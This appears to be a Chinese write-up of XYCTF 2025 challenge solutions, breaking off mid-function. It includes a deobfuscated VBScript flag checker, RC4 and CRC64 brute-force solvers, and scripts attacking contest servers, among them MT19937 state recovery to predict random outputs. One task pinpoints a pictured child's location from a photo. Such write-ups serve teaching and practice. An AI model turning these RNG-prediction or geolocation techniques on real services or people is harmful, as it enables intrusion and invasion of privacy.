1340-1308 ) & chr( 330066/3334 ) & chr( -9106+9211 ) & chr( 6064-5952 ) & chr( 6286-6182 ) & chr( -9220+9321 ) & chr( -2056+2170 ) & chr( 279444/4234 ) & chr( 5693-5572 ) & chr( 7627-7511 ) & chr( 9114-9013 ) & chr( 128864/4027 ) & chr( 465247/7627 ) & chr( -1215+1247 ) & chr( 9956-9841 ) & chr( -6215+6255 ) & chr( 26080/652 ) & chr( -5167+5282 ) & chr( 296520/7413 ) & chr( -5640+5745 ) & chr( -8069+8110 ) & chr( -740+772 ) & chr( 92235/2145 ) & chr( 6267-6235 ) & chr( -3504+3619 ) & chr( 11240/281 ) & chr( 753448/7108 ) & chr( -5324+5365 ) & chr( -5911+5952 ) & chr( -2746+2778 ) & chr( -2953+3030 ) & chr( 1074702/9682 ) & chr( -3942+4042 ) & chr( 8672-8640 ) & chr( 3343-3293 ) & chr( -9590+9643 ) & chr( -1920+1974 ) & chr( 190568/4648 ) & chr( -8907+8939 ) & chr( 4693-4605 ) & chr( 4103-3992 ) & chr( 1024974/8991 ) & chr( 117216/3663 ) & chr( -7725+7837 ) & chr( 1025460/9495 ) & chr( 6361-6264 ) & chr( 925995/8819 ) & chr( 166210/1511 ) & chr( 8106-8039 ) & chr( 256672/2468 ) & chr( 8511-8414 ) & chr( -1592+1706 ) & chr( 4349-4336 ) & chr( 20-10 ) & chr( 
131648/4114 ) & chr( 3440-3408 ) & chr( 3286-3254 ) & chr( 86528/2704 ) & chr( -209+241 ) & chr( 176256/5508 ) & chr( -4786+4818 ) & chr( 24576/768 ) & chr( 973581/8771 ) & chr( -5686+5803 ) & chr( 1068012/9207 ) & chr( 419760/5830 ) & chr( 438138/4338 ) & chr( 6119-5999 ) & chr( 56320/1760 ) & chr( -5861+5922 ) & chr( -9201+9233 ) & chr( 6816-6705 ) & chr( 8085-7968 ) & chr( -365+481 ) & chr( 604944/8402 ) & chr( 246238/2438 ) & chr( -8362+8482 ) & chr( 171296/5353 ) & chr( -4409+4447 ) & chr( 6653-6621 ) & chr( 336856/4108 ) & chr( -7684+7789 ) & chr( 2731-2628 ) & chr( 6687-6583 ) & chr( 93496/806 ) & chr( 1485-1445 ) & chr( 5893-5859 ) & chr( 410832/8559 ) & chr( -4662+4696 ) & chr( 44352/1386 ) & chr( -9673+9711 ) & chr( 86144/2692 ) & chr( 507744/7052 ) & chr( 9182-9081 ) & chr( 7532-7412 ) & chr( 8068-8028 ) & chr( 921096/9304 ) & chr( 7511-7406 ) & chr( 542752/4846 ) & chr( 7625-7521 ) & chr( 811939/8039 ) & chr( -5529+5643 ) & chr( 366498/5553 ) & chr( 366993/3033 ) & chr( 116/1 ) & chr( -4380+4481 ) & chr( 234889/5729 ) & chr( 374-330 ) & chr( 7121-7089 ) & chr( -964+1014 ) & chr( -9185+9226 ) & chr( 53105/4085 ) & chr( 1368-1358 ) & chr( 3776-3744 ) & chr( 81760/2555 ) & chr( 2908-2876 ) & chr( 672/21 ) & chr( 591084/7578 ) & chr( -9777+9878 ) & chr( 4310-4190 ) & chr( -329+445 ) & chr( 8841-8828 ) & chr( 80190/8019 ) & chr( 9449-9417 ) & chr( 5188-5156 ) & chr( 6912/216 ) & chr( 46496/1453 ) & chr( 8868-8855 ) & chr( -6823+6833 ) & chr( -5834+5866 ) & chr( 7348-7316 ) & chr( 214720/6710 ) & chr( -3281+3313 ) & chr( -6230+6312 ) & chr( -281+398 ) & chr( -5980+6090 ) & chr( 2673-2591 ) & chr( 233897/3491 ) & chr( -8111+8143 ) & chr( -3952+4013 ) & chr( 7846-7814 ) & chr( 5859-5748 ) & chr( 661752/5656 ) & chr( 742632/6402 ) & chr( 2362-2290 ) & chr( 286234/2834 ) & chr( 814-694 ) & chr( 40105/3085 ) & chr( 4489-4479 ) & chr( -838+907 ) & chr( -8563+8673 ) & chr( -2698+2798 ) & chr( -2969+3001 ) & chr( 7600-7530 ) & chr( 896805/7665 ) & chr( -8073+8183 ) & 
chr( 1727-1628 ) & chr( -6557+6673 ) & chr( 3501-3396 ) & chr( 87357/787 ) & chr( 4403-4293 ) & chr( 3724-3711 ) & chr( 4260-4250 ) & chr( -6051+6064 ) & chr( -71+81 ) & chr( 466-427 ) & chr( 6300-6268 ) & chr( -15360+8376 ) & chr( -1.435792E+08/8237 ) & chr( -21866-10 ) & chr( -4.86175E+07/8145 ) & chr( -1.932544E+08/5987 ) & chr( 3287-3159 ) & chr( -19485+2053 ) & chr( -10516-6235 ) & chr( 78936/6072 ) & chr( -9394+9404 ) & chr( 551807/7559 ) & chr( 973692/9546 ) & chr( 310720/9710 ) & chr( 507832/6682 ) & chr( 4001-3934 ) & chr( -4647+4744 ) & chr( -6770+6885 ) & chr( 491163/4863 ) & chr( 10032-9992 ) & chr( -1066+1148 ) & chr( 174330/1490 ) & chr( 986700/8970 ) & chr( 78064/952 ) & chr( -5671+5738 ) & chr( -6282+6322 ) & chr( 4287-4185 ) & chr( 3549-3441 ) & chr( 790162/8146 ) & chr( 8188-8085 ) & chr( -800+844 ) & chr( 522-490 ) & chr( -5550+5663 ) & chr( 284291/2389 ) & chr( -9338+9440 ) & chr( -6438+6539 ) & chr( 8277-8236 ) & chr( -8711+8752 ) & chr( -5591+5623 ) & chr( 148291/2431 ) & chr( -3434+3466 ) & chr( 425372/5597 ) & chr( -5132+5199 ) & chr( -322+419 ) & chr( 185380/1612 ) & chr( 5352-5251 ) & chr( 365160/9129 ) & chr( 9277-9158 ) & chr( -489+590 ) & chr( 913002/8951 ) & chr( -8433+8531 ) & chr( 8830-8713 ) & chr( 1089-970 ) & chr( 192990/1838 ) & chr( -9564+9681 ) & chr( -5453+5554 ) & chr( 40221/981 ) & chr( -7928+7960 ) & chr( 756672/9008 ) & chr( 785824/7556 ) & chr( 1607-1506 ) & chr( -5161+5271 ) & chr( -8087+8100 ) & chr( 90010/9001 ) & chr( 34688/1084 ) & chr( 20224/632 ) & chr( 8731-8699 ) & chr( 178496/5578 ) & chr( -837+914 ) & chr( -4694+4809 ) & chr( -7603+7706 ) & chr( 619212/9382 ) & chr( 1092906/9846 ) & chr( 7594-7474 ) & chr( 69632/2176 ) & chr( 133042/3913 ) & chr( 9457-9390 ) & chr( 2319-2208 ) & chr( 475200/4320 ) & chr( -8977+9080 ) & chr( -8597+8711 ) & chr( 1592-1495 ) & chr( 754812/6507 ) & chr( -6078+6195 ) & chr( -9522+9630 ) & chr( 1824-1727 ) & chr( -6145+6261 ) & chr( 312690/2978 ) & chr( -1513+1624 ) & chr( 
902220/8202 ) & chr( 1378-1263 ) & chr( -8522+8555 ) & chr( -6796+6828 ) & chr( -57+124 ) & chr( -4239+4350 ) & chr( 964212/8458 ) & chr( 573534/5031 ) & chr( 565903/5603 ) & chr( -8417+8516 ) & chr( 1116732/9627 ) & chr( -8648+8680 ) & chr( -6586+6656 ) & chr( -1832+1908 ) & chr( -5339+5404 ) & chr( 559267/7877 ) & chr( 138765/4205 ) & chr( 2868-2834 ) & chr( 556-543 ) & chr( 53810/5381 ) & chr( 212589/3081 ) & chr( -4647+4755 ) & chr( 712885/6199 ) & chr( -1506+1607 ) & chr( 91234/7018 ) & chr( 1299-1289 ) & chr( -4904+4936 ) & chr( 9659-9627 ) & chr( 117024/3657 ) & chr( 38720/1210 ) & chr( 440748/5724 ) & chr( 19320/168 ) & chr( -9444+9547 ) & chr( -3384+3450 ) & chr( 9050-8939 ) & chr( -6493+6613 ) & chr( -5110+5142 ) & chr( -2061+2095 ) & chr( 1450-1363 ) & chr( 111+3 ) & chr( 9913-9802 ) & chr( 152680/1388 ) & chr( -1082+1185 ) & chr( 4066-4034 ) & chr( 6896-6794 ) & chr( 838-730 ) & chr( -2902+2999 ) & chr( 5974/58 ) & chr( -8244+8290 ) & chr( -9640+9674 ) & chr( 36491/2807 ) & chr( -2075+2085 ) & chr( -301+370 ) & chr( -2824+2934 ) & chr( -2915+3015 ) & chr( 1811-1779 ) & chr( -7946+8019 ) & chr( -5275+5377 ) & chr( -7424+7437 ) & chr( 34620/3462 ) &  vbcrlf  )

"""
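def _eval_vbs_operand(expr):
    """Evaluate one constant arithmetic operand taken from a chr() call.

    The operand text comes out of a script that is being analysed, so it is
    parsed with ``ast`` and only numeric literals combined with + - * / are
    accepted. Anything else raises ValueError instead of being executed,
    which is what eval() would have done with it.
    """
    import ast
    import operator

    binary_ops = {
        ast.Add: operator.add,
        ast.Sub: operator.sub,
        ast.Mult: operator.mul,
        ast.Div: operator.truediv,
    }
    unary_ops = {ast.UAdd: operator.pos, ast.USub: operator.neg}

    def walk(node):
        if isinstance(node, ast.Constant) and type(node.value) in (int, float):
            return node.value
        if isinstance(node, ast.BinOp) and type(node.op) in binary_ops:
            return binary_ops[type(node.op)](walk(node.left), walk(node.right))
        if isinstance(node, ast.UnaryOp) and type(node.op) in unary_ops:
            return unary_ops[type(node.op)](walk(node.operand))
        raise ValueError(f"unsupported operand: {expr!r}")

    return walk(ast.parse(expr.strip(), mode="eval").body)


# Pull the arithmetic operand out of every chr( ... ) call in the script text.
expressions = re.findall(r'chr\(\s*([^)]+)\s*\)', vbs_code)
result = bytearray()
skipped = []
for expr in expressions:
    try:
        # round(), not int(): operands such as "-8.231351E+07/3957" were
        # printed with limited precision and land just short of the intended
        # integer, so truncation yields a value that is off by one.
        code = round(_eval_vbs_operand(expr))
    except (ValueError, SyntaxError, ZeroDivisionError, OverflowError):
        # Record what could not be decoded instead of silently dropping it.
        skipped.append(expr)
        continue
    if code < 0:
        # Negative operands are 16-bit character codes. In this sample each
        # one carries two consecutive bytes of the script's UTF-8 text, so
        # reducing it modulo 256 throws the high byte away and garbles every
        # non-ASCII comment. Other samples may use a different code page.
        code += 0x10000
    if code <= 0xFF:
        result.append(code)
    elif code <= 0xFFFF:
        result += code.to_bytes(2, "big")
    else:
        skipped.append(expr)

# Join the recovered bytes into the final script text.
decrypted = result.decode("utf-8", errors="replace")
print("解密后的字符串:", decrypted)
if skipped:
    print("skipped operands:", skipped)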

解密后的字符串

' Greet the user and read the candidate flag from an input dialog.
MsgBox "Dear CTFER. Have fun in XYCTF 2025!"
flag = InputBox("Enter the FLAG:", "XYCTF")
wefbuwiue = "90df4407ee093d309098d85a42be57a2979f1e51463a31e8d15e2fac4e84ea0df622a55c4ddfb535ef3e51e8b2528b826d5347e165912e99118333151273cc3fa8b2b3b413cf2bdb1e8c9c52865efc095a8dd89b3b3cfbb200bbadbf4a6cd4" ' Expected RC4 output for the correct flag, as a hex string
qwfe = "rc4key" ' Key handed to RunRC together with the entered flag

' RC4 routine: encrypts sMessage with strKey and returns the result as a
' hex string, two digits per input character.
Function RunRC(sMessage, strKey)
    Dim kLen, i, j, temp, pos, outHex
    Dim s(255), k(255)
    
    ' Initialisation: s holds the identity permutation 0..255, k holds the
    ' key's character codes repeated cyclically.
    kLen = Len(strKey)
    For i = 0 To 255
        s(i) = i
        k(i) = Asc(Mid(strKey, (i Mod kLen) + 1, 1)) ' Character code of the key character (Mid is 1-based)
    Next
    
    ' KSA: key-scheduling pass that shuffles s under control of the key.
    j = 0
    For i = 0 To 255
        j = (j + s(i) + k(i)) Mod 256
        temp = s(i)
        s(i) = s(j)
        s(j) = temp
    Next
    
    ' PRGA: produce one keystream byte per message character.
    i = 0 : j = 0 : outHex = ""
    For pos = 1 To Len(sMessage)
        i = (i + 1) Mod 256
        j = (j + s(i)) Mod 256
        temp = s(i)
        s(i) = s(j)
        s(j) = temp
        
        ' XOR the keystream byte with the message character and append it as hex.
        Dim plainChar, cipherByte
        plainChar = Asc(Mid(sMessage, pos, 1)) ' Character code of the current message character
        cipherByte = s((s(i) + s(j)) Mod 256) Xor plainChar
        outHex = outHex & Right("0" & Hex(cipherByte), 2) ' Left-pad with "0" and keep the last two hex digits
    Next
    
    RunRC = outHex
End Function

' Main check: encrypt the entered flag with RunRC and compare the result,
' case-insensitively, with the stored hex string.
If LCase(RunRC(flag, qwfe)) = LCase(wefbuwiue) Then
    MsgBox "Congratulations! Correct FLAG!"
Else
    MsgBox "Wrong flag."
End If

RC4加密,上脚本解密

def rc4(data, key):
    """Apply RC4 to *data* using the text key *key*.

    RC4 is a symmetric stream cipher, so the same call both encrypts and
    decrypts. *data* is an iterable of byte values and *key* is a non-empty
    str whose characters are used through ``ord``. Returns ``bytes``.
    """
    key_codes = [ord(ch) for ch in key]

    # KSA: start from the identity permutation and shuffle it with the key.
    state = list(range(256))
    swap_idx = 0
    for idx in range(256):
        swap_idx = (swap_idx + state[idx] + key_codes[idx % len(key_codes)]) & 0xFF
        state[idx], state[swap_idx] = state[swap_idx], state[idx]

    # PRGA: generate one keystream byte per input byte and XOR it in.
    x = y = 0
    out = []
    for value in data:
        x = (x + 1) & 0xFF
        y = (y + state[x]) & 0xFF
        state[x], state[y] = state[y], state[x]
        out.append(value ^ state[(state[x] + state[y]) & 0xFF])
    return bytes(out)


# Ciphertext taken from the decoded script, as a hex string.
ciphertext_hex = "90df4407ee093d309098d85a42be57a2979f1e51463a31e8d15e2fac4e84ea0df622a55c4ddfb535ef3e51e8b2528b826d5347e165912e99118333151273cc3fa8b2b3b413cf2bdb1e8c9c52865efc095a8dd89b3b3cfbb200bbadbf4a6cd4"
# Key taken from the decoded script.
key = "rc4key"

# Hex string -> raw bytes.
ciphertext_bytes = bytes.fromhex(ciphertext_hex)

# RC4 is symmetric: running it over the ciphertext yields the plaintext.
plaintext = rc4(ciphertext_bytes, key)
# errors='ignore' silently drops bytes that are not valid UTF-8.
decoded_text = plaintext.decode('utf-8', errors='ignore')
print("解密后的明文:", decoded_text)

得到
flag{We1c0me_t0_XYCTF_2025_reverse_ch@lleng3_by_th3_w@y_p3cd0wn's_chall_is_r3@lly_gr3@t_&_fuN!}
再经 MD5 转换,得到最终提交的 flag:XYCTF{5f9f46c147645dd1e2c8044325d4f93c}

Dragon

查壳可得

让ai分析一下

得到一个可查看文件

让ai分析一下,exp如下:

#!/usr/bin/env python3
# -*- coding: utf-8 -*-

from itertools import product

# 1. CRC64 target values taken from the LLVM IR. They are written here as
#    signed 64-bit integers; the mask turns each one into its unsigned
#    64-bit representation so it can be compared with the computed CRC.
enc = [
    signed_value & 0xFFFFFFFFFFFFFFFF
    for signed_value in (
        -2565957437423125689,
        224890624719110086,
        1357324823849588894,
        -8941695979231947288,
        -253413330424273460,
        -7817463785137710741,
        -5620500441869335673,
        984060876288820705,
        -6993555743080142153,
        -7892488171899690683,
        7190415315123037707,
        -7218240302740981077,
    )
]

# 2. CRC64 parameters: the ECMA polynomial and a 64-bit mask.
POLY = 0x42F0E1EBA9EA3693
MASK64 = 0xFFFFFFFFFFFFFFFF

def calculate_crc64_direct(data: bytes) -> int:
    """Compute a bit-by-bit, MSB-first CRC64 of *data*.

    Follows the calculate_crc64_direct routine from the LLVM IR: the register
    starts as all ones, each byte is XORed into the top 8 bits, POLY is
    applied whenever the top bit falls out, and the result is inverted.
    """
    top_bit = 1 << 63
    crc = MASK64
    for byte in data:
        # Bring the next byte into the highest 8 bits of the register.
        crc = (crc ^ (byte << 56)) & MASK64
        for _ in range(8):
            carry = crc & top_bit
            crc = (crc << 1) & MASK64
            if carry:
                crc ^= POLY
    # Final inversion.
    return crc ^ MASK64

def main():
    """Recover the flag two characters at a time by matching CRC64 values.

    Each entry of ``enc`` is treated as the CRC64 of one two-character chunk,
    so a chunk is found by trying every pair from a fixed alphabet. The
    function stops early when a chunk has no match in that alphabet.
    """
    # Alphabet to try: letters, digits and punctuation commonly seen in flags.
    charset = 'abcdefghijklmnopqrstuvwxyz' \
              'ABCDEFGHIJKLMNOPQRSTUVWXYZ' \
              '0123456789_{}-!?.'
    recovered = bytearray()

    print("[*] 开始爆破,每组 2 字符,共 %d 组" % len(enc))
    for idx, target in enumerate(enc):
        print(f"[*] 第 {idx+1:02d} 组,目标 CRC64 = {hex(target)} ... ", end='', flush=True)
        # First pair (in product order) whose CRC64 equals the target.
        hit = next(
            (
                a + b
                for a, b in product(charset, repeat=2)
                if calculate_crc64_direct((a + b).encode('ascii')) == target
            ),
            None,
        )
        if hit is None:
            print("!!! 未找到匹配 !!!")
            return
        print(f"匹配: {hit}")
        recovered.extend(hit.encode('ascii'))

    flag = recovered.decode('ascii', errors='ignore')
    print("\n[+] 爆破完成,拼接得到 flag:")
    print(flag)
    # Extra pass over the last target (index 11): list every pair that
    # matches it, not only the first one found above.
    candidates = [
        a + b
        for a, b in product(charset, repeat=2)
        if calculate_crc64_direct((a + b).encode()) == enc[11]
    ]
    print("候选匹配:", candidates)


if __name__ == '__main__':
    main()

moon

Pyd逆向,直接用网上的frida hook脚本 hook pyd api ,这道题只需要hook xor就行。
然后把每次异或的值打出来。

接着找密文,异或就是flag

# Ciphertext bytes (35 values).
data = [
    0x42, 0x6b, 0x87, 0xab, 0xd0, 0xce, 0xaa, 0x3c,
    0x58, 0x76, 0x1b, 0xbb, 0x01, 0x72, 0x60, 0x6d,
    0xd8, 0xab, 0x06, 0x44, 0x91, 0xa2, 0xa7, 0x6a,
    0xf9, 0xa9, 0x3e, 0x1a, 0xe5, 0x6f, 0xa8, 0x42,
    0x06, 0xa2, 0xf7,
]
# XOR values (presumably the ones printed by the hook). The list has 45
# entries; only the first 35 line up with the ciphertext.
key = [
    0x24, 0x7, 0xe6, 0xcc, 0xab, 0xac, 0xdf, 0x48, 0x7, 0xf, 0x2b, 0xce,
    0x5e, 0x1e, 0x50, 0x5d, 0xb3, 0x98, 0x62, 0x1b, 0xe4, 0xd2, 0xf8, 0x2a,
    0x8d, 0xf6, 0x4a, 0x72, 0xd6, 0x30, 0xc5, 0xd, 0x49, 0xcc, 0x8a, 0x89,
    0xb3, 0x73, 0xde, 0x12, 0xd1, 0xfa, 0x17, 0x8, 0xd0,
]
# zip() stops at the shorter list (data), so the extra key values are unused.
data = [cipher_byte ^ key_byte for cipher_byte, key_byte in zip(data, key)]
print(''.join(map(chr, data)))

MISC

XGCTF

去ctfshow找XGCTF wp
看到web3有相关字符

搜索引擎得到

查看http://dragonkeeep.top/category/CISCN%E5%8D%8E%E4%B8%9C%E5%8D%97WEB-Polluted/index.html网站源代码

Base64解码
flag{1t_I3_t3E_s@Me_ChAl1eNge_aT_a1L_P1e@se_fOrg1ve_Me}

签个到吧

观察发现这个brainfuck没有输出字符

让ai补齐输出字符

解密

MADer也要当CTFer

观看视频可以发现字幕文件有特殊字符

把字幕导出来

去除多余字符

复制到010中

通过字符串查找猜测可能是AE文件

导入发现缺少

安装完库后,进入项目,查看图层,根据常识可得flag2为flag

右键编辑文本ctrl+a ctrl+c ctrl+v得出l_re@IIy_w@nn@_2_Ie@rn_AE
Flag为flag{l_re@IIy_w@nn@_2_Ie@rn_AE}

曼波曼波曼波


文件内容有连续的大写A、等于号,还有/号,是base64的特征;把内容逆序一下再base64解码
exp:

import base64

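# Step 1: reverse the text of smn.txt character by character and save it.
with open('smn.txt', 'r', encoding='utf-8') as f:
    content = f.read()

reversed_content = content[::-1]

with open('1.txt', 'w', encoding='utf-8') as f:
    f.write(reversed_content)

print("已将 smn.txt 字符逆序写入 1.txt")

# Step 2: read the reversed text back in.
with open('1.txt', 'r', encoding='utf-8') as f:
    b64_content = f.read()

# Drop surrounding newlines and spaces before decoding.
b64_content = b64_content.strip()

# Step 3: Base64-decode and store the raw bytes in 2.txt.
# NOTE: b64decode() without validate=True silently discards characters that
# are not in the Base64 alphabet, so a damaged input can still "decode".
try:
    decoded_bytes = base64.b64decode(b64_content)
    with open('2.txt', 'wb') as f:
        f.write(decoded_bytes)
    print("已将 base64 解码内容写入 2.txt")
except Exception as e:
    # The handler body has to be indented under `except`; as published the
    # print sat at column 0, which is a syntax error.
    print("Base64 解码失败:", e)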

得到一个FFD8FFE8的文件,猜测是JPG

随波逐流查看有隐藏文件

提取得到以下文件

有个图片查看没有信息,有个压缩包,secret提示密码为好像是什么比赛名字加年份
猜测可能是XYCTF2025
得到一个图片,和一开始的easy图片长得差不多,猜测为双图盲水印

用随波逐流做双图盲水印提取,解得flag

会飞的雷克萨斯

通过百度识图,可以得到四川小孩哥等信息

翻找相关报道可以找出大概位置

查找美宜佳附近的店铺,结合提示xx省xx市xx县xxx路xxxxxx内
可以猜测xxxxxx内为中铁城市中心内flag{四川省内江市资中县春岚北路中铁城市中心内}

Greedymen

贪心算法

exp:

#!/usr/bin/env python3
from pwn import remote
import re

HOST = '8.147.132.32'
PORT = 16814

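def factors(n):
    """Return the set of proper divisors of n (every divisor except n itself).

    For n <= 1 the result is empty: 1 has no divisor other than itself, so
    returning {1} there would contradict "proper".
    """
    if n <= 1:
        return set()
    res = {1}
    # Integer-only bound (i * i <= n): n ** 0.5 is a float and can be off by
    # one for large n.
    i = 2
    while i * i <= n:
        if n % i == 0:
            res.add(i)
            res.add(n // i)
        i += 1
    return res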

def choose_number(unassigned):
    """Pick the number with the best net gain, or None if nothing is playable.

    A number is playable only when at least one of its factors (as returned
    by factors()) is still unassigned. Its net gain is the number itself
    minus the sum of those still-unassigned factors. On ties the earliest
    number in *unassigned* wins.
    """
    remaining = set(unassigned)
    top_pick, top_net = None, -1e9
    for candidate in unassigned:
        live_factors = factors(candidate) & remaining
        if not live_factors:
            # None of its factors is left, so the number cannot be taken.
            continue
        net = candidate - sum(live_factors)
        if net > top_net:
            top_pick, top_net = candidate, net
    return top_pick

def read_state(conn):
    """Read one state block from *conn*, echo it, and return it as one string.

    Lines are read with a 2-second timeout until one contains
    "Unassigned Numbers"; three more lines are then read without a timeout
    (Counter, Your Score, Opponent Score). An empty read ends the block early.
    """
    pieces = []
    while True:
        text = conn.recvline(timeout=2).decode(errors='ignore')
        if text == "":
            break
        print(text, end="")   # echo for debugging
        pieces.append(text)
        if "Unassigned Numbers" not in text:
            continue
        # The three lines after the number list complete the block.
        for _ in range(3):
            extra = conn.recvline().decode(errors='ignore')
            print(extra, end="")
            pieces.append(extra)
        break
    return "".join(pieces)

def parse_state(data):
    """Extract (unassigned, counter, my_score, opponent_score) from a state block.

    *data* is the text returned by read_state(). If an expected field is
    missing, re.search() returns None and the .group() call raises
    AttributeError.
    """
    def int_field(label):
        # Integer that follows "<label>: " in the block.
        return int(re.search(label + r": (\d+)", data).group(1))

    number_list = re.search(r"\[([0-9, ]+)\]", data).group(1)
    unassigned = [int(token) for token in number_list.split(',')]
    return (
        unassigned,
        int_field("Counter"),
        int_field("Your Score"),
        int_field("Opponent Score"),
    )

def play():
    """Connect to the game service and play until the counter is 0 or no numbers remain.

    Each round reads the state, picks a number with choose_number() (falling
    back to the first unassigned number) and sends it. Whatever the service
    prints afterwards is echoed. The connection is closed only on the normal
    path; an exception in between leaves it open.
    """
    conn = remote(HOST, PORT)
    # Echo the first line of the greeting / menu.
    print(conn.recvuntil(b"\n", timeout=2).decode(errors='ignore'), end="")
    # Menu entry 1 starts the game.
    conn.sendline(b"1")

    while True:
        unassigned, cnt, my, op = parse_state(read_state(conn))
        if cnt == 0 or not unassigned:
            break
        pick = choose_number(unassigned)
        pick = unassigned[0] if pick is None else pick
        print(f"[+] Counter={cnt}, My={my}, Op={op}, Pick={pick}")
        conn.sendline(str(pick).encode())

    # Remaining output of the service (contains the flag).
    print(conn.recvall(timeout=2).decode(errors='ignore'))
    conn.close()

if __name__ == '__main__':
    play()

Crypto

Division

mt19937

from pwn import *
from randcrack import RandCrack
import sys

def main():
    """Predict the service's next random quotient from 624 observed outputs.

    Phase 1 asks the service 624 times for a division with denominator 1 and
    feeds each numerator to RandCrack. Phase 2 predicts the next 11000-bit
    and 10000-bit values, submits their integer quotient and prints the reply.

    NOTE(review): the approach relies on the service drawing its numbers from
    a Mersenne Twister (MT19937) generator, whose internal state can be
    rebuilt from 624 outputs. Values that must be unpredictable should come
    from a CSPRNG (in Python, the `secrets` module).
    """
    # Log level and timeout settings
    context.log_level = 'debug'
    context.timeout = 15  # global timeout: 15 seconds
    
    # Connect to the remote service
    try:
        p = remote('39.106.69.240', 22648)
    except Exception as e:
        print(f"连接失败: {e}")
        sys.exit(1)

    rc = RandCrack()

    # Phase 1: collect 624 random numbers
    try:
        for i in range(624):
            # Choose menu option 1
            p.sendlineafter(b': >>> ', b'1')
            
            # Send denominator 1 and read the result line
            p.sendlineafter(b'denominator: >>> ', b'1')
            line = p.recvline().decode().strip()
            
            # The numerator is the part before '//'
            # (assumes each numerator is one 32-bit generator output — TODO confirm)
            if '//' not in line:
                print(f"异常响应: {line}")
                sys.exit(2)
            nominator = int(line.split('//')[0])
            rc.submit(nominator)
            
            # Progress report every 100 samples
            if (i+1) % 100 == 0:
                print(f"已收集 {i+1}/624 个随机数...")
    except EOFError:
        print("连接意外中断")
        sys.exit(3)

    # Phase 2: predict the large numbers and submit the answer
    try:
        # Predict the next two random values
        print("开始预测大随机数...")
        rand1 = rc.predict_getrandbits(11000)
        rand2 = rc.predict_getrandbits(10000)
        correct_ans = rand1 // rand2
        print(f"预测答案: {correct_ans}")

        # Submit the answer
        p.sendlineafter(b': >>> ', b'2')
        p.sendlineafter(b'answer: >>> ', str(correct_ans).encode())

        # Read the reply in chunks until the connection ends, a read comes
        # back empty, or a '}' shows up
        flag = b''
        while True:
            try:
                chunk = p.recv(timeout=5)
                if not chunk:
                    break
                flag += chunk
                if b'}' in flag:  # closing brace of the flag seen
                    break
            except EOFError:
                break
        print("\n最终响应:")
        print(flag.decode(errors='ignore'))
        
    except Exception as e:
        print(f"执行异常: {e}")
    finally:
        p.close()

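# Run main() only when the file is executed as a script. The call has to be
# indented under the `if`; at column 0 the file does not parse.
if __name__ == '__main__':
    main()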

Reed

靠线性模型和已知取值范围 来暴力求解 a。
核心思路:利用「差分穷举」解出 a

exp:

import string
from collections import Counter
from pwn import remote

HOST = '8.147.132.32'
PORT = 25211
M = 19198111
table = string.ascii_letters + string.digits  # len=62

def egcd(a, b):
    """Extended Euclid: return (x, y, g) with a*x + b*y == g == gcd(a, b).

    Iterative form; it walks the same quotient sequence as the recursive
    definition and yields the same coefficients.
    """
    prev_r, r = a, b
    prev_x, x = 1, 0
    prev_y, y = 0, 1
    while r != 0:
        q = prev_r // r
        prev_r, r = r, prev_r - q * r
        prev_x, x = x, prev_x - q * x
        prev_y, y = y, prev_y - q * y
    return (prev_x, prev_y, prev_r)

def inv_mod(a, m):
    """Return the inverse of a modulo m, or None when gcd(a, m) is not 1."""
    coeff, _, gcd = egcd(a % m, m)
    return coeff % m if gcd == 1 else None

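def fetch_enc(seed=123):
    """Send *seed* to the service and return the ciphertext it prints back.

    The reply line comes from the network, so it is parsed with
    ast.literal_eval instead of eval: eval would execute whatever expression
    the peer sends, while literal_eval only accepts Python literals
    (presumably a list of integers here — verify against the service).
    The connection is closed even if the exchange fails.
    """
    import ast  # local import: only this function needs it

    conn = remote(HOST, PORT)
    try:
        conn.recvuntil(b'give me seed:')
        conn.sendline(str(seed).encode())
        line = conn.recvline().decode().strip()
    finally:
        conn.close()
    return ast.literal_eval(line)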

def recover_a(enc):
    """Guess the multiplier a of c = a*m + b (mod M) by majority vote.

    For every pair of different ciphertexts and every non-zero plaintext
    difference dm in [-61, 61], the candidate (c_i - c_j) * dm^-1 mod M gets
    one vote; the value with the most votes is returned. Raises IndexError
    if no candidate was produced at all.
    """
    # Inverses of all possible dm, computed once and kept in the same order
    # in which the votes are cast.
    inverses = []
    for dm in range(-61, 62):
        if dm == 0:
            continue
        inv = inv_mod(dm, M)
        if inv is not None:
            inverses.append(inv)

    votes = Counter()
    total = len(enc)
    for i in range(total):
        for j in range(i + 1, total):
            dc = (enc[i] - enc[j]) % M
            if dc == 0:
                continue  # identical ciphertexts carry no information
            for inv in inverses:
                votes[(dc * inv) % M] += 1
    a, cnt = votes.most_common(1)[0]
    print(f"[+] Found a = {a} (votes={cnt})")
    return a

def recover_flag(enc, a):
    """Recover the flag text from *enc* once the multiplier *a* is known.

    Tries every possible index m0 (0..61) for the first character, derives
    b = enc[0] - a*m0 (mod M) and accepts the first b for which every
    ciphertext maps to an index inside the 62-character table. Raises
    RuntimeError when no b fits.
    """
    a_inv = inv_mod(a, M)
    for m0 in range(62):
        b = (enc[0] - a * m0) % M
        indices = [((c - b) * a_inv) % M for c in enc]
        if all(0 <= idx < 62 for idx in indices):
            body = ''.join(table[idx] for idx in indices)
            return f"XYCTF{{{body}}}"
    raise RuntimeError("No valid b found")

def main():
    """Fetch one ciphertext with seed 123, recover a, then print the flag."""
    ciphertext = fetch_enc(123)
    print(f"[+] Ciphertext: {ciphertext}")
    multiplier = recover_a(ciphertext)
    print(f"[+] Recovered flag: {recover_flag(ciphertext, multiplier)}")

if __name__ == '__main__':
    main()

Complex_signin

二元copper

# Sage 10.5
from Crypto.Util.number import *
from Crypto.Cipher import ChaCha20
import itertools
import hashlib

class Complex:
    """Minimal complex number whose parts can be any ring elements.

    Offers only what the solver uses: multiplication, equality,
    component-wise shifts, printing and conversion to a [re, im] list.
    """

    def __init__(self, re, im):
        self.re = re
        self.im = im

    def __mul__(self, c):
        # (a + bi)(c + di) = (ac - bd) + (ad + bc)i
        return Complex(
            self.re * c.re - self.im * c.im,
            self.re * c.im + self.im * c.re,
        )

    def __eq__(self, c):
        same_re = self.re == c.re
        return same_re and self.im == c.im

    def __rshift__(self, m):
        # Shift both parts right by m bits.
        return Complex(self.re >> m, self.im >> m)

    def __lshift__(self, m):
        # Shift both parts left by m bits.
        return Complex(self.re << m, self.im << m)

    def __str__(self):
        if self.im == 0:
            return str(self.re)
        if self.re == 0:
            if abs(self.im) == 1:
                return ('-' if self.im < 0 else '') + 'i'
            return f"{self.im}i"
        sign = '+' if self.im > 0 else '-'
        return f"{self.re} {sign} {abs(self.im)}i"

    def tolist(self):
        """Return the number as [re, im]."""
        return [self.re, self.im]

def complex_pow(c, exp, n):
